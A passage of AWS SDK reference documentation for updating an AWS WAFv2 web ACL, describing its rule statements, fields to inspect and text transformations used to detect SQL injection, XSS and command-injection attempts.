'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type DefaultAction: dict
:param DefaultAction: [REQUIRED]\nThe action to perform if none of the Rules contained in the WebACL match.\n\nBlock (dict) --Specifies that AWS WAF should block requests by default.\n\nAllow (dict) --Specifies that AWS WAF should allow requests by default.\n\n\n
:type Description: string
:param Description: A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an 